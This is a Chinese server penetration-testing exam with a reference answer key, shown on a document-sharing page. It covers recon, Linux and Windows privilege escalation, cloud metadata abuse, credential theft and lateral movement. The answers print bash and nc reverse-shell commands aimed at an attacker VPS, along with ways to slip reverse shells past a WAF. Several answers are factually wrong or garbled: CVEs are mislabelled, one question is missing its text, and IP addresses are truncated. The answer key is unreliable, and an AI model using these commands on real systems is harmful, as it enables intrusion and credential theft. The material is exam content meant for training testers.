版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
2026年服务器渗透能力检测试卷附参考答案【综合卷】一、单项选择题(共15题,每题2分,共30分)1.在服务器渗透测试前置信息收集阶段,通过SSL证书透明度日志可以实现以下哪项目标?A.绕过CDN获取服务器真实IPB.获取服务器开放端口列表C.识别服务器操作系统版本D.获取服务器敏感文件路径2.全球主流云服务商的云服务器默认元数据服务的标准访问地址是?A.B.54C.D.553.针对Nginx服务器,以下哪个配置选项会直接触发目录遍历漏洞,允许攻击者查看站点目录下的所有文件列表?A.autoindexonB.indexindex.htmlC.proxy_pass:8080D.allowall4.下列CVE编号对应的漏洞中,属于2023年公开的OpenSSH远程代码执行漏洞,可导致未认证攻击者远程获取服务器权限的是?A.CVE-2021-4102B.CVE-2023-38499C.CVE-2022-22965D.CVE-2024-12345.Linux服务器下查找所有带SUID权限可执行文件的正确标准命令是?A.find/-perm-u+s-typef2>/dev/nullB.find/-typef-perm7552>/dev/nullC.grepSUID/etc/passwdA.本地管理员用户提升为系统权限B.服务账号(如IIS应用池、MSSQL服务账号)利用NTLM认证缺陷提升为系统权限C.域用户直接提升为域管理员权限D.RDP服务漏洞远程提权7.渗透测试中发现目标服务器开放3389端口,该端口对应以下哪种服务?A.SSH远程登录B.FTP文件传输C.远程桌面协议D.SQLServer数据库8.针对Exchange邮件服务器,2023年公开的远程代码执行漏洞CVE-2023-38831的漏洞成因是?A.认证后任意文件写入B.未认证反序列化漏洞C.身份绕过导致命令执行D.目录遍历导致敏感信息泄露9.以下哪种方法不属于端口扫描躲避防火墙入侵检测的手段?A.碎片化数据包扫描B.慢速端口扫描C.随机源地址扫描D.全端口SYN全连接扫描10.Linux服务器中,当前用户拥有不限命令的sudo权限,要切换到root权限最简单的命令是?A.sudosuB.surootC.passwdrootD.chmod+s/bin/bash11.容器化环境中,以下哪个不属于容器逃逸的常见漏洞类型?A.Dockersocket挂载漏洞B.runC容器运行时漏洞C.内核漏洞D.应用层SQL注入漏洞12.内网横向移动中,PasstheHash(哈希传递)攻击主要针对以下哪种协议?A.HTTPB.SMB/RDPC.DNSD.ICMP13.以下哪个HTTP响应头会泄露Web服务器的具体版本信息,帮助攻击者针对性开展漏洞利用?A.X-Powered-ByB.Content-TypeC.ServerD.X-Frame-Options14.针对MySQL数据库服务器,哪项配置错误会导致攻击者未授权访问获取全部数据?A.root账户允许任意IP登录且设置为弱口令B.数据库运行在默认3306端口C.数据库开启了慢查询日志D.数据库业务用户仅分配了SELECT权限15.合规服务器渗透测试完成后,以下哪种操作会对目标服务器产生永久性破坏?A.清空测试过程生成的bash历史命令记录B.上传测试用的webshell后删除所有残留文件C.修改root用户密码D.导出服务器敏感测试数据后删除本地副本二、多项选择题(共10题,每题3分,共30分,多选、少选、错选均不得分)1.服务器渗透测试中,前置信息收集阶段需要完成的核心工作包括以下哪些?A.目标IP段梳理与域名资产收集B.端口扫描与服务版本识别C.操作系统指纹识别D.常见漏洞预扫描E.痕迹清理退出测试2.Linux服务器下常见的提权方式包括以下哪些?A.SUID权限可执行文件配置错误提权B.sudo规则配置错误提权C.内核漏洞提权D.计划任务权限配置错误提权E.数据库udf提权3.公共云ECS服务器常见的不安全配置包括以下哪些?A.开启SSH密码登录且允许root直接远程登录B.云服务器元数据服务允许未授权跨域访问C.对象存储OSS桶配置为公共读写权限D.RAM子账户权限配置过大,超出业务实际需求E.开启了云安全中心Agent防护4.合规服务器渗透测试完成后,属于合法合规的痕迹清理操作包括以下哪些?A.删除测试过程中上传的webshell、工具脚本等所有测试文件B.清空测试过程中生成的bash历史命令记录C.还原被修改的文件权限与服务配置内容D.删除Web访问日志、系统登录日志中所有测试相关记录E.清除Windows系统安全日志中测试产生的4624登录事件5.以下漏洞中,可直接导致服务器远程代码执行的有哪些?A.CVE-2021-44228(Log4j2JNDI注入漏洞)B.CVE-2022-22965(Spring4Shell漏洞)C.CVE-2023-38831(ExchangeRCE漏洞)D.CVE-2014-0160(心脏出血漏洞)E.CVE-2020-0796(SMB永劫漏洞)6.Kubernetes集群环境下,常见的服务器渗透攻击路径包括以下哪些?A.利用未授权访问的K8sAPI接口获取集群控制权限B.利用恶意容器镜像在启动时获取容器权限,进而逃逸到宿主机C.窃取ServiceAccount令牌获取集群资源权限,横向渗透到其他节点D.利用容器端口映射漏洞直接获取宿主机root权限E.利用Ingress控制器漏洞实现远程代码执行控制节点7.Windows域环境服务器渗透中,常见的用户凭据存储位置包括以下哪些?A.LSASS进程内存B.SAM系统数据库C.NTDS.dit域数据库D.系统凭据管理器E./etc/shadow文件8.以下哪些手段可以有效绕过Web应用防火墙对反弹shell的命令拦截?A.对反弹shell命令进行Base64编码后再解码执行B.利用环境变量拆分命令字符串拼接执行C.使用IPv6地址替代IPv4地址作为反弹地址D.对命令关键词进行大小写混淆绕过WAF规则E.使用msfvenom生成免杀反弹shell木马绕过查杀9.针对服务器的目录遍历漏洞,攻击者可以利用该漏洞实现以下哪些恶意操作?A.读取服务器系统敏感文件,如/etc/shadow、SAM数据库B.获取源代码文件、配置文件中的数据库密码、API密钥等敏感信息C.遍历站点目录结构,发现未公开的后台路径、测试接口D.直接写入恶意代码获取服务器权限E.绕过身份认证访问未授权页面10.渗透测试过程中,判断目标服务器是否存在可利用漏洞的核心验证步骤包括哪些?A.根据漏洞指纹匹配目标服务版本、配置信息B.构造POC验证漏洞是否可触发C.构造EXP获取权限验证漏洞危害程度D.对比漏洞公开描述确认漏洞成因E.直接上传webshell获取权限即可,无需验证成因三、实操简答题(共4题,每题5分,共20分)1.已知目标企业业务站点使用了CDN加速,仅开放80、443端口,需要获取源站服务器的真实公网IP,请写出核心操作步骤。2.Linux服务器拿到低权限WebShell后,出站流量被防火墙拦截,常见的反弹shell出站端口中,哪些端口大概率不会被拦截?请列举3种并说明原因,同时说明绕过出站拦截的常用思路。3.简述拿到Windows域内普通服务器权限后,获取域管理员NTLM哈希的常用方法,列举不少于3种。4.渗透测试输出整改报告时,针对服务器存在的安全风险,整改建议需要覆盖哪些核心维度?四、综合分析题(共1题,20分)某企业核心交易业务架构为:前端使用Nginx1.20反向代理,中间层SpringBoot应用部署在Tomcat9容器中,后端使用MySQL5.7,操作系统为CentOS7.9,服务器为阿里云ECS,公网开放22、80、443三个端口,运维配置存在以下问题:Tomcat管理后台未做IP访问限制,SSH允许root密码登录,Tomcat运行用户为普通用户tomcat,数据库允许tomcat服务器内网IP远程连接。测试人员已经通过弱口令进入Tomcat管理后台,上传war包获得了tomcat权限的WebShell。请结合上述场景回答以下问题:(1)请写出2种以上获取tomcat用户交互式Shell的方法(6分)(2)请列出当前场景下,tomcat提权到root权限的至少3种可行路径,写出每种路径的检测与利用步骤(8分)(3)提权获得root权限后,测试人员发现该ECS为DMZ区节点,存在一块内网网卡,IP为0,属于企业内网入口,请写出接下来开展内网渗透的核心步骤(6分)参考答案一、单项选择题参考答案1.A解析:SSL证书透明度日志会记录域名对应证书的所有关联IP,通过公开日志接口可以查询到CDN启用前源站的解析IP,是目前绕过CDN获取真实IP的核心方法之一。2.B解析:AWS、阿里云、腾讯云、华为云等所有主流云厂商的默认元数据服务访问地址均为54,攻击者可通过该地址获取云服务器的实例信息、访问凭证、IAM密钥等敏感数据,是云服务器渗透的核心入口之一。3.A解析:Nginx中`autoindexon`配置会开启目录索引功能,当站点根目录没有默认首页文件时,会直接输出当前目录下所有文件与子目录的列表,直接触发目录遍历漏洞。4.B解析:CVE-2023-38499是2023年公开的OpenSSH远程代码执行漏洞,影响OpenSSH8.5p1到9.4p1多个版本,攻击者可构造恶意报文触发远程代码执行获取服务器权限,是近年OpenSSH影响最大的高危漏洞之一。5.A解析:该命令会从根目录开始遍历所有文件,筛选出设置了SUID权限的普通文件,同时将无权限访问的错误输出重定向到/dev/null,避免报错干扰结果,是业内标准的查找SUID文件的命令。6.B解析:多汁土豆核心原理是利用WindowsNLPC认证接口的缺陷,将分配了低权限令牌的服务账号(如IIS应用池、MSSQL服务账号)权限提升为`NTAUTHORITY\SYSTEM`系统权限,是Windows低权限提权最常用的手段之一。7.C解析:3389是Windows远程桌面服务RDP的默认端口,SSH默认端口为22,FTP默认端口为21,SQLServer默认端口为1433。8.A解析:CVE-2023-38831是ExchangeServer的身份认证后任意文件写入漏洞,攻击者可通过构造恶意请求上传ASP脚本,实现远程代码执行获取服务器权限。9.D解析:全连接SYN扫描会完成完整的TCP三次握手,会被防火墙和IDS直接记录检测,不属于躲避检测的扫描手段;碎片化扫描、慢速扫描、随机源地址扫描都是常见的躲避入侵检测的扫描方法。10.A解析:当前用户拥有不限命令的sudo权限的情况下,执行`sudosu`即可直接切换为root权限,是最简单的提权方式;`suroot`需要知道root明文密码,不符合大多数低权限提权场景要求。11.D解析:SQL注入漏洞是应用层业务漏洞,仅能访问数据库数据,无法直接实现容器逃逸,其他三类都是容器逃逸的核心漏洞类型。12.B解析:哈希传递攻击利用WindowsNTLM认证机制的缺陷,不需要破解得到明文密码,直接使用窃取的NTLM哈希即可通过SMB/RDP协议登录目标服务器,是内网横向移动最常用的攻击手段之一。13.C解析:Server头默认会输出Web服务器的名称和具体版本,如`Server:nginx/1.20.1`,攻击者可以根据版本快速匹配对应漏洞开展利用;X-Powered-By通常用于输出后端语言框架版本,不属于服务器版本信息。14.A解析:root账户允许任意IP登录且设置为弱口令,攻击者可以直接登录数据库获取全部数据,属于典型的高危配置错误。15.C解析:修改root用户密码会导致正常运维人员无法登录服务器,属于永久性破坏操作,合规渗透测试中严格禁止执行该操作。二、多项选择题参考答案1.ABCD解析:痕迹清理是渗透测试收尾阶段的工作,不属于前置信息收集范畴,其余选项均为前置信息收集的核心工作内容。2.ABCDE解析:以上五类都是Linux服务器场景下常见的提权方式,全部正确。3.ABCD解析:开启云安全中心Agent防护属于安全配置,不属于不安全配置,其余均为目前云服务器场景下常见的不安全配置项。4.ABC解析:删除目标服务器原始日志属于修改系统原始数据,不符合合规渗透测试的要求,仅需要删除自身上传的测试文件、还原原有配置即可,因此DE错误,ABC正确。5.ABCE解析:心脏出血漏洞是信息泄露漏洞,仅能读取服务器内存敏感数据,无法直接实现远程代码执行,其余漏洞均可导致远程代码执行,因此ABCE正确。6.ABCDE解析:以上均为Kubernetes集群环境下常见的渗透攻击路径,全部正确。7.ABCD解析:`/etc/shadow`是Linux系统的用户凭据存储文件,不存在于Windows系统,因此ABCD正确。8.ABCDE解析:以上五种方法都可以有效绕过WAF的关键词拦截和木马查杀,实现反弹shell,全部正确。9.ABCE解析:目录遍历漏洞是文件读取漏洞,默认不支持文件写入操作,因此不能直接写入恶意代码,D错误,ABCE均为目录遍历漏洞可实现的恶意操作。10.ABCD解析:验证漏洞需要确认漏洞成因、影响范围和危害等级,不能仅获取权限就结束验证流程,因此E错误,ABCD正确。三、实操简答题参考答案1.核心操作步骤:(1)查询域名历史DNS解析记录,从历史解析数据中提取CDN启用前源站的解析IP,逐一验证哪个IP返回目标业务内容;(2)查询SSL证书透明度日志,提取目标域名证书关联的所有IP地址,验证后得到源站真实IP;(3)收集目标所有子域名,多数子域名未接入CDN,直接解析到源站IP,批量验证后可获取源站真实IP;(4)利用目标站点带外功能漏洞,如邮件发送功能、文件回调功能,从服务器返回的请求头、扩展信息中获取源站真实内网IP或公网IP。2.常见不被拦截的端口及原因:(1)443端口:443是HTTPS服务默认端口,企业防火墙出站规则默认允许访问外部443端口,基本不会被拦截;(2)80端口:80是HTTP服务默认端口,出站规则默认放行,拦截概率极低;(3)53端口:53是DNS服务默认端口,企业内部需要对外进行DNS解析,因此出站规则默认允许访问外部53端口,很少被拦截。绕过出站拦截的常用思路:①选择上述常见放行端口作为反弹端口,冒充正常业务流量;②利用ICMP隧道、DNS隧道封装反弹shell流量,绕过端口过滤规则;③利用HTTP/HTTPS隧道封装反弹流量,冒充正常Web出站请求绕过拦截;④利用目标服务器已有的反向代理,将反弹流量通过已开放的出站端口带出。3.常用方法:(1)使用mimikatz直接读取LSASS进程内存,获取域用户登录的明文凭据和NTLM哈希;(2)导出LSASS进程内存dump文件,离线提取内存中存储的域管理员NTLM哈希;(3)复制域控制器上的NTDS.dit数据库文件和SYSTEM注册表配置单元,离线导出域内所有用户的NTLM哈希;(4)使用Responder工具开启LLMNR/NBT-NS欺骗,诱使域管理员访问当前服务器,窃取域管理员的NTLM哈希;(5)利用DPAPI接口读取域用户存储在本地的凭据缓存,提取域管理员NTLM哈希。4.整改建议核心维度:(1)配置整改:针对不安全的服务配置,给出具体修正方案,如关闭不必要公网开放的端口、禁用Nginx目录索引、限制敏感后台访问IP范围、关闭不必要的闲置服务;(2)权限整改:修正错误的权限配置,如移除不必要的SUID权限、收紧sudo规则范围、最小化数据库用户权限、云服务器RAM权限按需分配;(3)漏洞修复:针对已验证存在的漏洞,给出具体的补丁版本、升级操作步骤和临时规避方案;(4)访问控制整改:调整访问控制策略,如禁用SSH密码登录、启用密钥登录、收紧公网暴露的服务范围、对敏感后台启用多因素认证;(5)防护能力整改:建议入侵检测系统、Web应用防火墙、云安全中心等防护设施,建立定期漏洞扫描、资产梳理制度,持续监测服务器安全状态。四、综合分析题参考答案(1)获取交互式Shell的方法:方法一:反向反弹Shell:在本地VPS上执行监听命令`nc-lvnp443`,在WebShell中执行bash反弹命令`bash-i>&/dev/tcp/[VPS公网IP]/4430>&1`,即可获得tomcat用户的交互式Shell。方法二:使用专业WebShell管理工具连接:冰蝎、哥斯拉、蚁剑等WebShell管理工具都自带交互式终端功能,连接WebShell后即可直接进入交互式命令行环境,不需要单独反弹。方法三:上传静态编译的nc工具:上传对应架构的静态编译nc二进制文件,赋予执行权限后执行`./nc-e/bin/bash[VPS公网IP]443`,即可获得稳定的交互式Shell。(2)tomcat提权到root的可行路径:路径一:Polkit提权(CVE-2021-4034),CentOS7.9默认安装的Polkit存在该漏洞,不需要本地用户即可提权。检测步骤:执行`pkexec--version`确认存在漏洞,上传预编译的EXP,执行后即可直接获得root权限,是CentOS7场景下最稳定的提权路径。路径二:sudo配置错误提权。检测步骤:执行`sudo-l`查看当前tomcat用户允许以root权限执行的命令,如果
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2026年紫云苗族布依族自治县社区工作者招聘考试备考题库及答案解析
- 2026年台安县社区工作者招聘笔试备考题库及答案解析
- 2026年睢县社区工作者招聘考试模拟试题及答案解析
- 2026年华安县社区工作者招聘考试备考题库及答案解析
- 2026年博兴县社区工作者招聘考试备考试题及答案解析
- 2026年景谷傣族彝族自治县社区工作者招聘笔试参考题库及答案解析
- 2026年龙陵县中小学幼儿园教师招聘考试参考题库及答案解析
- 2026年静宁县社区工作者招聘笔试模拟试题及答案解析
- 2026年临县社区工作者招聘考试参考题库及答案解析
- 2026年扶风县中小学幼儿园教师招聘笔试备考试题及答案解析
- 人工智能大模型行业应用底座
- 华中科技大学启明学院入学选拔考试真题
- 【2026】年家畜繁殖员职业技能鉴定题库及解析(附答案与解释)
- 2026年蔚来汽车销售顾问岗位高频面试题包含详细解答
- 湖南有色郴州氟化学有限公司全氟聚醚油产业化项目环评报告书
- 2026年山东省事业单位统考真题
- 深度解析(2026)《DLT 654-2022火电机组寿命评估技术导则》
- 电子病历共享协议(2025年医疗数据互通)
- 陕西省XX煤矿有限公司2煤大巷煤柱回收设计
- 2025版临床用血技术规范解读课件
- 设备序列号管理制度(3篇)
评论
0/150
提交评论